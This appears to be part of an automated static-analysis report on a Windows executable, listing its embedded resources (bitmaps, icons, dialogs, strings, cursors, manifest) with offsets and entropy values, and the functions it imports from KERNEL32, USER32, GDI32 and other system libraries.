                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4448500x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4765151515151515
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4450a80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240EnglishUnited States0.41569767441860467
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4452000x188Device independent bitmap graphic, 48 x 12 x 4, image size 288EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x445fb80x1e8Device independent bitmap graphic, 48 x 16 x 4, image size 384EnglishUnited States0.5081967213114754
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x446ac80xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.18736462093862816
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4475a00xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.1844765342960289
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4480780xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.19497523000707714
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x448b880x7e2Device independent bitmap graphic, 25 x 26 x 24, image size 1978, resolution 2834 x 2834 px/mEnglishUnited States0.24033696729435083
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4493700xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.1935598018400566
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x449e800x134Device independent bitmap graphic, 17 x 17 x 4, image size 204EnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4461a00x928Device independent bitmap graphic, 48 x 16 x 24, image size 0, resolution 2834 x 2834 px/mEnglishUnited States0.533703071672355
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4445200x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.7518518518518519
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x444d780x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.3790123456790123
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4453880xc2aDevice independent bitmap graphic, 64 x 16 x 24, image size 3074, resolution 2834 x 2834 px/mEnglishUnited States0.42485549132947975
RT_BITMAP | 0x4418c8 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.9367816091954023
RT_BITMAP | 0x441ba0 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.4482758620689655
RT_BITMAP | 0x441e78 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.33524904214559387
RT_BITMAP | 0x442150 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.3371647509578544
RT_BITMAP | 0x449fb8 | 0x32a | Device independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/m | English | United States | 0.6320987654320988
RT_BITMAP | 0x44a2e8 | 0x2256 | Device independent bitmap graphic, 324 x 9 x 24, image size 8750, resolution 2834 x 2834 px/m | English | United States | 0.0608646188850967
RT_BITMAP | 0x44c540 | 0x602a | Device independent bitmap graphic, 192 x 32 x 32, image size 24578, resolution 2834 x 2834 px/m | English | United States | 0.2250385896498497
RT_BITMAP | 0x452570 | 0x2028 | Device independent bitmap graphic, 128 x 16 x 32, image size 0 | English | United States | 0.24708454810495628
RT_BITMAP | 0x454598 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11570247933884298
RT_BITMAP | 0x455978 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.10999606454151908
RT_BITMAP | 0x456d58 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11511216056670602
RT_BITMAP | 0x458138 | 0xeb2 | Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/m | English | United States | 0.13157894736842105
RT_BITMAP | 0x458ff0 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11983471074380166
RT_BITMAP | 0x45a3d0 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.27371113734750097
RT_BITMAP | 0x45b7b0 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.2699724517906336
RT_BITMAP | 0x45cb90 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.2426210153482881
RT_BITMAP | 0x45df70 | 0xeb2 | Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/m | English | United States | 0.3413078149920255
RT_BITMAP | 0x45ee28 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.23868555686737505
RT_BITMAP | 0x460208 | 0x5a66 | Device independent bitmap graphic, 77 x 75 x 32, image size 23102, resolution 2834 x 2834 px/m | English | United States | 0.046365914786967416
RT_BITMAP | 0x330640 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x3306f8 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x2f54f0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.40053763440860213
RT_ICON | 0x2f57d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5202702702702703
RT_ICON | 0x466c68 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.33198924731182794
RT_ICON | 0x466f50 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.41216216216216217
RT_ICON | 0x4670a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.42905405405405406
RT_ICON | 0x4671c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.2661290322580645
RT_ICON | 0x4674d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.18010752688172044
RT_ICON | 0x4677c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.35135135135135137
RT_ICON | 0x4678e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.06092057761732852
RT_ICON | 0x468190 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.07658959537572255
RT_ICON | 0x4686f8 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | English | United States | 0.042901234567901236
RT_ICON | 0x4693a0 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | English | United States | 0.10550458715596331
RT_ICON | 0x469768 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6400709219858156
RT_ICON | 0x469bd0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5
RT_MENU | 0x469d20 | 0x11c | data | English | United States | 0.573943661971831
RT_DIALOG | 0x32ed28 | 0x80 | data | English | United States | 0.7265625
RT_DIALOG | 0x43d048 | 0x13c | data | English | United States | 0.5949367088607594
RT_DIALOG | 0x43d188 | 0x1a4 | data | English | United States | 0.5380952380952381
RT_DIALOG | 0x43c9b0 | 0xe6 | data | English | United States | 0.6347826086956522
RT_DIALOG | 0x43ca98 | 0x390 | data | English | United States | 0.4418859649122807
RT_DIALOG | 0x43ce28 | 0x21c | data | English | United States | 0.5037037037037037
RT_DIALOG | 0x43d330 | 0x390 | data | English | United States | 0.4692982456140351
RT_DIALOG | 0x43d6c0 | 0x1dc | data | English | United States | 0.5441176470588235
RT_DIALOG | 0x43d8a0 | 0x346 | data | English | United States | 0.46897374701670647
RT_DIALOG | 0x43dbe8 | 0x334 | data | English | United States | 0.43658536585365854
RT_DIALOG | 0x43c958 | 0x58 | data | English | United States | 0.8068181818181818
RT_DIALOG | 0x43df20 | 0x23c | data | English | United States | 0.5122377622377622
RT_DIALOG | 0x43e8f0 | 0x1c2 | data | English | United States | 0.5066666666666667
RT_DIALOG | 0x43e160 | 0x160 | data | English | United States | 0.5994318181818182
RT_DIALOG | 0x43e2c0 | 0xb2 | data | English | United States | 0.7191011235955056
RT_DIALOG | 0x43e378 | 0x3d4 | data | English | United States | 0.3408163265306122
RT_DIALOG | 0x43e750 | 0x19e | data | English | United States | 0.6280193236714976
RT_DIALOG | 0x43eab8 | 0x1a2 | data | English | United States | 0.5741626794258373
RT_DIALOG | 0x43ec60 | 0x34 | data | English | United States | 0.8076923076923077
RT_DIALOG | 0x43ec98 | 0x2a8 | data | English | United States | 0.5338235294117647
RT_DIALOG | 0x43ef40 | 0x382 | data | English | United States | 0.48552338530066813
RT_DIALOG | 0x330520 | 0xe8 | data | English | United States | 0.6336206896551724
RT_DIALOG | 0x330608 | 0x34 | data | English | United States | 0.9038461538461539
RT_STRING | 0x469e40 | 0x1f6 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.44223107569721115
RT_STRING | 0x46a038 | 0x3e | data | English | United States | 0.7096774193548387
RT_STRING | 0x46a078 | 0x60 | data | English | United States | 0.8125
RT_STRING | 0x46a0d8 | 0x76 | data | English | United States | 0.8983050847457628
RT_STRING | 0x46a150 | 0xb6 | AmigaOS bitmap font "(W\211[\335\210E\232\325R\013z\017_/", 25451 elements, 2nd, 3rd | English | United States | 0.8791208791208791
RT_STRING | 0x46a208 | 0x110 | data | English | United States | 0.7794117647058824
RT_STRING | 0x46a318 | 0x216 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.46441947565543074
RT_STRING | 0x46a530 | 0x42 | data | English | United States | 0.6818181818181818
RT_STRING | 0x46a578 | 0x116 | data | English | United States | 0.5323741007194245
RT_STRING | 0x46a690 | 0x14a | data | English | United States | 0.5545454545454546
RT_STRING | 0x46c2b8 | 0x32c | data | English | United States | 0.4125615763546798
RT_STRING | 0x46c5e8 | 0x248 | data | English | United States | 0.5085616438356164
RT_STRING | 0x46d2e0 | 0x84 | data | English | United States | 0.5833333333333334
RT_STRING | 0x46c830 | 0x2a8 | data | English | United States | 0.36176470588235293
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cad80x20edataEnglishUnited States0.3155893536121673
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cce80x24cdataEnglishUnited States0.4370748299319728
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d3680x3cdataEnglishUnited States0.65
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cf380x16edataEnglishUnited States0.39344262295081966
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d0a80xa6Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.7228915662650602
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d3a80x184dataEnglishUnited States0.4742268041237113
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d5300x66dataEnglishUnited States0.696078431372549
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d7d80x1d6Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0EnglishUnited States0.35319148936170214
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d5980x186dataEnglishUnited States0.5384615384615384
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d7200xb2dataEnglishUnited States0.6179775280898876
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d9b00x48Matlab v4 mat-file (little endian) a, numeric, rows 0, columns 0EnglishUnited States0.7083333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d1500x18cdataEnglishUnited States0.398989898989899
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a8980x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46aa200x4eedataEnglishUnited States0.375594294770206
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b2a00x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46afc00x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bce80x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46af100xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bbd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b5080x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b9b00x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bcb80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bd780x53edataEnglishUnited States0.2965722801788376
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4668280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4665880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x465da80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x465ef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4660480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4661980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4662e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4664380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4666d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4669780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x466ac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x466c180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f2980x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fa880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f3f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f9380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f7e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3301180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f6980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fd280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f5480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fbd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fe780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32ffc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3302680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3303b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3305080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x2f59000x22dataEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4670780x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4674b00x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4697080x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x469cf80x22dataEnglishUnited States1.1176470588235294
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_VERSION0x32eda80x2fcdataEnglishUnited States0.4698952879581152
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x46d9f80x4d7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1179), with CRLF line terminatorsEnglishUnited States0.47699757869249393
                                                                                                                                                                                                                                                                                                                                                                                                                  None0x466c300x1cdataEnglishUnited States1.2857142857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  None0x466c500x18dataEnglishUnited States1.2916666666666667
DLL | Import
KERNEL32.dll | GetStringTypeW, WriteConsoleW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, InitializeSListHead, ExitProcess, GetStdHandle, GetFileType, SetStdHandle, HeapQueryInformation, QueryPerformanceFrequency, VirtualQuery, VirtualAlloc, GetCommandLineA, FreeLibraryAndExitThread, ExitThread, CreateThread, CreateDirectoryW, RtlPcToFileHeader, RtlUnwindEx, OutputDebugStringW, LCMapStringW, GetCPInfo, GetStartupInfoW, GetSystemTimeAsFileTime, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WaitForSingleObjectEx, ResetEvent, GetUserDefaultLCID, GetTempFileNameW, FindResourceExW, SystemTimeToTzSpecificLocalTime, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FileTimeToLocalFileTime, SetErrorMode, SearchPathW, GetProfileIntW, GetTempPathW, VirtualProtect, GlobalGetAtomNameW, GetThreadLocale, lstrcmpiW, IsDebuggerPresent, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, GlobalFlags, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GetCurrentDirectoryW, GetFileSize, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, CompareStringW, GlobalFindAtomW, EncodePointer, CopyFileW, MulDiv, GlobalSize, lstrcpyW, GlobalFree, GlobalUnlock, FreeResource, GlobalAddAtomW, GetCurrentProcessId, lstrcmpW, GlobalDeleteAtom, GlobalLock, GlobalAlloc, LoadLibraryExW, GetCurrentThread, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, GetModuleHandleExW, InitializeCriticalSectionAndSpinCount, SetLastError, OutputDebugStringA, ResumeThread, SuspendThread, SetThreadPriority, GetCurrentThreadId, CreateEventW, SetEvent, VerifyVersionInfoW, VerSetConditionMask, LocalFree, FormatMessageW, SearchPathA, GetLocalTime, SetFileAttributesA, GetSystemInfo, lstrcpyA, CreateFileW, lstrlenA, GetModuleFileNameW, WriteFile, SizeofResource, GetFileAttributesW, GetWindowsDirectoryW, GetSystemDirectoryW, CreateProcessW, GetModuleHandleW, FindResourceW, LoadResource, LoadLibraryW, LockResource, GetModuleHandleA, WideCharToMultiByte, GetPrivateProfileStringW, MultiByteToWideChar, GetSystemDefaultLangID, GetPrivateProfileSectionNamesW, GetPrivateProfileIntW, WritePrivateProfileStringW, GetTickCount, Sleep, lstrcmpA, K32EnumProcesses, Process32FirstW, Process32NextW, CreateToolhelp32Snapshot, OpenProcess, GetProcessId, FileTimeToSystemTime, lstrlenW, GetProcessHeap, DeleteCriticalSection, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, LeaveCriticalSection, GetCommandLineW, EnterCriticalSection, HeapFree, FreeLibrary, GetProcAddress, CloseHandle, GetLastError, GetVersionExW, WaitForSingleObject, GetCurrentProcess
USER32.dll | MoveWindow, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, SetWindowLongW, EqualRect, CopyRect, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, SetForegroundWindow, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, SetFocus, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, InvalidateRect, UpdateWindow, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, CheckDlgButton, CreateAcceleratorTableW, UnregisterClassW, EnableWindow, IsIconic, GetMenuState, GetMenuStringW, MapDialogRect, SetWindowContextHelpId, UnhookWindowsHookEx, PtInRect, ScreenToClient, ClientToScreen, SetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, SetCursor, ShowOwnedPopups, PostQuitMessage, DrawIconEx, IsRectEmpty, OffsetRect, InflateRect, FillRect, DrawFocusRect, GetSysColorBrush, GetSysColor, MapWindowPoints, RedrawWindow, SetWindowRgn, DrawStateW, GetFocus, DrawFrameControl, DrawEdge, RegisterWindowMessageW, SetWindowTextW, IsDialogMessageW, IntersectRect, SetLayeredWindowAttributes, SetRectEmpty, LoadCursorW, SystemParametersInfoW, EnumDisplayMonitors, SetParent, MonitorFromPoint, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DestroyIcon, CallNextHookEx, SetWindowsHookExW, LoadImageW, CopyImage, TrackMouseEvent, IsZoomed, CharUpperW, GetAsyncKeyState, SetCapture, ReleaseCapture, GetClientRect, LoadIconW, DrawIcon, GetSystemMetrics, SendMessageW, PostMessageW, GetDesktopWindow, MessageBoxA, GetWindowTextA, PeekMessageW, DispatchMessageW, RegisterWindowMessageA, GetClassNameA, GetWindow, GetWindowThreadProcessId, GetParent, GetClassNameW, FindWindowW, EnumWindows, GetDlgCtrlID, IsWindow, ShowWindow, EnumChildWindows, GetWindowRect, SetDlgItemTextW, MessageBoxW, SetWindowPos, wsprintfW, GetMessageW, TranslateMessage, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, GetKeyNameTextW, SubtractRect, RegisterClipboardFormatW, CharUpperBuffW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, FrameRect, LoadAcceleratorsW, IsClipboardFormatAvailable, PostThreadMessageW, IsCharLowerW, MapVirtualKeyExW, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, GetComboBoxInfo, CreateMenu, DestroyCursor, GetWindowRgn, HideCaret, InvertRect, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, UpdateLayeredWindow, SendDlgItemMessageA, WaitMessage, RealChildWindowFromPoint, GetUpdateRect, SetClassLongPtrW, DestroyAcceleratorTable, ModifyMenuW, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CopyIcon, GetIconInfo, GetDoubleClickTime, EnableScrollBar, DestroyMenu, SetTimer, KillTimer, LoadMenuW, GetSystemMenu, DeleteMenu, MessageBeep, WindowFromPoint, NotifyWinEvent, SetCursorPos, SetRect, UnionRect, BringWindowToTop, CreatePopupMenu, LockWindowUpdate
GDI32.dll | PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextColor, SetTextAlign, GetObjectW, MoveToEx, TextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetMapMode, LineTo, DPtoLP, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, RealizePalette, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateRoundRectRgn, Rectangle, GetRgnBox, OffsetRgn, RoundRect, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetViewportOrgEx, LPtoDP, GetWindowOrgEx, SetPixelV, GetTextFaceW, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteObject, CreatePatternBrush, CreatePen, CreateCompatibleDC, CreateBitmap, BitBlt, GetDeviceCaps, CreateDCW, CopyMetaFileW, GetTextMetricsW, Polyline, Polygon, CreatePolygonRgn, ExtTextOutW, PatBlt, GetTextExtentPoint32W, GetTextColor, GetBkColor, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreateHatchBrush, CreateEllipticRgn, CombineRgn, SetRectRgn, Ellipse, DeleteDC
MSIMG32.dll | TransparentBlt, AlphaBlend
WINSPOOL.DRV | DocumentPropertiesW, OpenPrinterW, ClosePrinter
